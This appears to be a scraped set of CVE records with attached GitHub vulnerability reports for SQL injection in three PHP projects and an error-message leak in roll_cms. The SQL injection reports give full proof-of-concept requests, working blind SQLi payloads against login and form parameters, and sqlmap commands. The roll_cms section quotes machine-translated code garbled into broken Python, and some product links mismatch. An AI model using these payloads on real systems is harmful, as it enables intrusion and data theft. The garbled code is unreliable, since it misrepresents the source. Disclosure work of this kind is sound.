[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ppp-src/ha/issues/8" }, { "source": "cna@vuldb.com", "tags": [ "Product" ], "url": "https://itsourcecode.com/" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.276797" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.276797" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.403998" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:payroll_management_system_project:payroll_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "BFB980ED-C02B-49D9-845F-8953C6709DB1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/ppp-src/ha/issues/8
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "ppp-src", "ha" ]
# Itsourcecode "Payroll Management System " in PHP 1.0 "ajax.php" SQL injection # NAME OF AFFECTED PRODUCT(S) + Payroll Management System ## Vendor Homepage + https://itsourcecode.com/free-projects/php-project/online-food-ordering-system-source-code/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter + xxxx ## Vulnerable File + ajax.php ## VERSION(S) + V1.0 ## Software Link + https://itsourcecode.com/wp-content/uploads/2019/04/bookstoragesystem.zip # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + A SQL injection vulnerability was found in the 'ajax.php' file of the 'Payroll Management System' project. The reason for this issue is that attackers inject malicious code from the parameter "id" and use it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations. ## Impact + Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. # DESCRIPTION + During the security review of the PHP "Payroll Management System", "xxx" discovered a critical SQL injection vulnerability in the "ajax.php" file. This vulnerability stems from insufficient user input validation of the "id" parameter, allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity. # No login or authorization is required to exploit this vulnerability # Vulnerability details and POC --- POST /ajax.php?action=delete_deductions HTTP/1.1 Host: 192.168.1.108:96 Content-Length: 4 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://192.168.1.108:96 Referer: http://192.168.1.108:96/index.php?page=deductions Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=lpqq2adhvnpc9800mplg0j61ic Connection: close id=1 --- ## Vulnerability type: + boolean-based blind ## Vulnerability location: + 'id' parameter ## Payload: --- -Parameter: id (POST) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: id=(SELECT (CASE WHEN (2978=2978) THEN 1 ELSE (SELECT 7087 UNION SELECT 8578) END)) --- + ![1](https://github.com/user-attachments/assets/a5167b30-d037-43f4-9760-5273c1715b7b) ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: + ![2](https://github.com/user-attachments/assets/f6924fef-1f0c-4c47-b84e-d0850484e91a) + ![3](https://github.com/user-attachments/assets/2f46487f-30ab-45bf-bbea-6c2194cb06e4) +![4](https://github.com/user-attachments/assets/69a233b9-d9c5-4ab3-bccb-f86fbfc4f415) # Suggested repair 1. **Use prepared statements and parameter binding:** Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. 2. **Input validation and filtering:** Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. **Regular security audits:** Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
Itsourcecode "Payroll Management System " in PHP 1.0 "ajax.php" SQL injection
https://api.github.com/repos/ppp-src/ha/issues/8/comments
0
2024-09-07T01:57:19Z
2024-09-07T01:57:19Z
https://github.com/ppp-src/ha/issues/8
2,511,380,300
8
6,264
CVE-2024-8569
2024-09-08T05:15:10.763
A vulnerability has been found in code-projects Hospital Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file user-login.php. The manipulation of the argument username leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 6.9, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "NONE", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Product" ], "url": "https://code-projects.org/" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/teachersongsec/cve/issues/1" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.276799" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.276799" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.403125" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:fabianros:hospital_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "7FD44159-7FA3-4BA5-AD83-C1D439EEF374", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/teachersongsec/cve/issues/1
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "teachersongsec", "cve" ]
# code-projects Hospital Management System Using PHP With Source Code v1.0 user-login.php SQL injection # usernameOF AFFECTED PRODUCT(S) + Hospital Management System Using PHP With Source Code ## Vendor Homepage + https://code-projects.org/hospital-management-system-using-php-source-code/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter + teachersongsec ## Vulnerable File + user-login.php ## VERSION(S) + V1.0 ## Software Link + https://download.code-projects.org/details/e13ce994-d280-4a64-90fb-f08663479bb4 # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + A SQL injection vulnerability was found in the 'user-login.php' file of the 'Hospital Management System Using PHP With Source Code' project. The reason for this issue is that attackers inject malicious code from the parameter "username" and use it directly in SQL queries without appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations. <img width="804" alt="1" src="https://github.com/user-attachments/assets/4dca7f0d-6e45-4e04-9803-5b645aa3e29a"> ## Impact + Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. # DESCRIPTION + Due to insufficient user input verification for the "username" parameter, a serious SQL injection vulnerability has been discovered in the "Hospital Management System Using PHP With Source Code", allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to the database, modify or delete data, and access sensitive information without logging in. Immediate remedial measures are needed to ensure system security and protect data integrity. # No login verification required # Vulnerability details and POC ``` POST /hms/user-login.php HTTP/1.1 Host: 192.168.203.199:1218 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 48 Origin: http://192.168.203.199:1218 Connection: close Referer: http://192.168.203.199:1218/hms/user-login.php Cookie: PHPSESSID=0mi2ldjjhl6u55bftg19fatl84; pma_lang=zh_CN; phpMyAdmin=ecgqsunqkk259gps6g855hpj7h; pmaUser-1=%7B%22iv%22%3A%22XCt6WG5l8jF93ZNn8aw0gw%3D%3D%22%2C%22mac%22%3A%2200a51771b9141770e6b859aa0d04353eda02b3c3%22%2C%22payload%22%3A%22yQBymdYR171xOgwHdZj8kQ%3D%3D%22%7D; pmaAuth-1=%7B%22iv%22%3A%22pWtm%5C%2FRqRJaUxcIEYY65xuQ%3D%3D%22%2C%22mac%22%3A%22aed483f364ce5dde1c3d367c399a45081d9e1e53%22%2C%22payload%22%3A%22H6CYC%5C%2FW40soknhBMNNUVcs6GbzmqoaAfuJvX1LwioPE%3D%22%7D; Attendance_Management_System=m9le8it5h61k0g6rddsuoes9a3 Upgrade-Insecure-Requests: 1 Priority: u=0, i username=admin&password=admin123&submit=&submit= ``` ## Vulnerability type: + time-based blind ## Vulnerability location: + 'username' parameter ## Payload: ``` Parameter: username (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: username=admin' AND (SELECT 4737 FROM (SELECT(SLEEP(5)))tNIf) AND 'VAgb'='VAgb&password=admin123&submit=&submit= ``` <img width="619" alt="2" src="https://github.com/user-attachments/assets/47db04f0-1fe3-464a-8424-11c0696ec47a"> ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: ```bash sqlmap -r 123 --batch --dbs ``` <img width="497" alt="3" src="https://github.com/user-attachments/assets/2a9fa551-26c4-48df-b969-36198da75cd6"> # Suggested repair 1. **Use prepared statements and parameter binding:** Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. 2. **Input validation and filtering:** Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. **Regular security audits:** Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
code-projects Hospital Management System Using PHP With Source Code v1.0 user-login.php SQL injection
https://api.github.com/repos/teachersongsec/cve/issues/1/comments
0
2024-09-05T08:48:18Z
2024-09-05T08:48:19Z
https://github.com/teachersongsec/cve/issues/1
2,507,171,933
1
6,265
CVE-2024-8570
2024-09-08T07:15:01.977
A vulnerability was found in itsourcecode Tailoring Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /inccatadd.php. The manipulation of the argument title leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "LOW", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/teachersongsec/cve/issues/2" }, { "source": "cna@vuldb.com", "tags": [ "Product" ], "url": "https://itsourcecode.com/" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.276800" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?id.276800" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.403126" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:angeljudesuarez:tailoring_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "D6D27827-5554-4FAB-8460-52599930F4FF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/teachersongsec/cve/issues/2
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "teachersongsec", "cve" ]
# Itsourcecode Tailoring Management System Project In PHP With Source Code v1.0 inccatadd.php SQL injection # NAME OF AFFECTED PRODUCT(S) + Tailoring Management System Project In PHP With Source Code ## Vendor Homepage + https://itsourcecode.com/free-projects/php-project/tailoring-management-system-project-in-php-with-source-code/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter + teachersongsec ## Vulnerable File + inccatadd.php ## VERSION(S) + V1.0 ## Software Link + https://itsourcecode.com/wp-content/uploads/2021/04/tailoring-management-system-project-in-php-with-source-code.zip # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + A SQL injection vulnerability was found in the 'inccatadd.php' file of the 'Tailoring Management System Project In PHP With Source Code' project. The reason for this issue is that attackers inject malicious code from the parameter "title" and use it directly in SQL queries without appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations. <img width="624" alt="1" src="https://github.com/user-attachments/assets/2d08d39b-8e36-4637-9a43-aa740cff761d"> ## Impact + Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. # DESCRIPTION + Due to insufficient user input validation for the "title" parameter, a serious SQL injection vulnerability has been discovered in the "Tailoring Management System Project in PHP With Source Code", allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity. # Vulnerability details and POC ``` POST /inccatadd.php HTTP/1.1 Host: 192.168.1.138:2223 Content-Length: 9 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.1.138:2223 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://192.168.1.138:2223/inccatadd.php Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Cookie: __utma=123545163.603012537.1718449838.1718449838.1718449838.1; __utmz=123545163.1718449838.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=umavm58j5beqmmme0aof5v26v4 Connection: close title=123 ``` ## Vulnerability type: + time-based blind ## Vulnerability location: + 'title' parameter ## Payload: ``` Parameter: title (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: title=123' AND (SELECT 6960 FROM (SELECT(SLEEP(5)))kEHc) AND 'yOHO'='yOHO ``` <img width="309" alt="2" src="https://github.com/user-attachments/assets/d0a8b981-3902-432c-bf68-5277ef96c634"> ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: ```bash sqlmap -r 123 --batch --dbs ``` <img width="316" alt="3" src="https://github.com/user-attachments/assets/751f4697-637a-45df-9f36-3791661057d9"> # Suggested repair 1. **Use prepared statements and parameter binding:** Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. 2. **Input validation and filtering:** Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. **Regular security audits:** Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
Itsourcecode Tailoring Management System Project In PHP With Source Code v1.0 inccatadd.php SQL injection
https://api.github.com/repos/teachersongsec/cve/issues/2/comments
0
2024-09-05T08:50:05Z
2024-09-05T08:50:06Z
https://github.com/teachersongsec/cve/issues/2
2,507,176,177
2
6,266
CVE-2024-8571
2024-09-08T08:15:13.157
A vulnerability was found in erjemin roll_cms up to 1484fe2c4e0805946a7bcf46218509fcb34883a9. It has been classified as problematic. This affects an unknown part of the file roll_cms/roll_cms/views.py. The manipulation leads to information exposure through error message. This product takes the approach of rolling releases to provide continious delivery. Therefore, version details for affected and updated releases are not available.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "ADJACENT_NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 2.7, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:A/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 5.1, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "NONE", "baseScore": 3.5, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.1, "impactScore": 1.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "ADJACENT", "availabilityRequirement": "NOT_DEFINED", "baseScore": 5.1, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "LOW", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Issue Tracking" ], "url": "https://github.com/erjemin/roll_cms/issues/1" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.276801" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.276801" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.400796" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:erjemin:roll_cms:*:*:*:*:*:*:*:*", "matchCriteriaId": "6760B301-68D3-4FBD-B0BA-D46392FBDDB3", "versionEndExcluding": "2024-08-31", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "209" ]
209
https://github.com/erjemin/roll_cms/issues/1
[ "Issue Tracking" ]
github.com
[ "erjemin", "roll_cms" ]
Generation of Error Message Containing Sensitive Information in roll_cms/roll_cms/views.py ``` Snippets of code roll_cms/roll_cms/views.py (lines 360 to 360) : except TemplateDoesNotExist as e: Snippet of code roll_cms/roll_cms/views.py (lines 362 through 362) : Return an HttpResponse (f "О Ш И Б К А RollCSM: н е н а й д е н ш а б л о н \" {e} \ ". С о з д а й т е е f о. ", the status = 424) ``` ``` Snippet of code roll_cms/roll_cms/views.py (lines 363 through 363) : except TemplateNotFound as e: Snippet of code roll_cms/roll_cms/views.py (lines 365 to 365) : Return an HttpResponse (f "RollCSM н е н а ш л а п р о и з kind guide о д н ы й ш а б л о н \" {e} \ ". С о з д а й т е е f о. ", the status = 424) ``` ``` Snippet of code roll_cms/roll_cms/views.py (lines 399 through 399) : except TbRoll.DoesNotExist as e: Snippet of code roll_cms/roll_cms/views.py (lines 401 through 402) : Return an HttpResponse (the content = f "RollCSM н е н а ш л а р о л л а c id = {roll_id}. " F "С о з д а й т е е f о discusses some related problems е р е з п а н е л ь а д м и н и с т р и р о kind guide а н и second. {e}", status=424) ``` ``` 代码 roll_cms/roll_cms/views.py 片段(行 403 到 403 ): except (AttributeError, TemplateDoesNotExist, TemplateNotFound, ) as e: 代码 roll_cms/roll_cms/views.py 片段(行 409 到 410 ): return HttpResponse(content=f"RollCSM не нашла шаблон для ролла c id={roll_id}. " f"Создайте его. {e}", status=424) ``` ``` Snippet of code roll_cms/roll_cms/views.py (lines 429 through 429) : except TbItem.DoesNotExist as e: Snippet of code roll_cms/roll_cms/views.py (lines 431 through 432) : Return an HttpResponse (the content = f "RollCSM н е н а ш л а э л е м е н т c id = {item_id}. " F "С о з д а й т е е f о discusses some related problems е р е з п а н е л ь а д м и н и с т р и р о kind guide а н и second. {e}", status=424) ``` ``` Snippet of code roll_cms/roll_cms/views.py (lines 507 through 507) : except UndefinedError as e: Snippet of code roll_cms/roll_cms/views.py (lines 509 through 511) : Return an HttpResponse (the content = f "RollCSM н е м о ж е т о т о б р а з и т ь ш а б л о н : \" {template_name} \" " f" af af af af af af af af af af af af af " f" {e}", status=424) ``` The product generates an error message that includes sensitive information about its environment, users, or associated data. + Extended Description The sensitive information may be valuable information on its own (such as a password), or it may be useful for launching other, more serious attacks. The error message may be created in different ways: self-generated: the source code explicitly constructs the error message and delivers it externally-generated: the external environment, such as a language interpreter, handles the error and constructs its own message, whose contents are not under direct control by the programmer An attacker may use the contents of error messages to help launch another, more focused attack. For example, an attempt to exploit a path traversal weakness 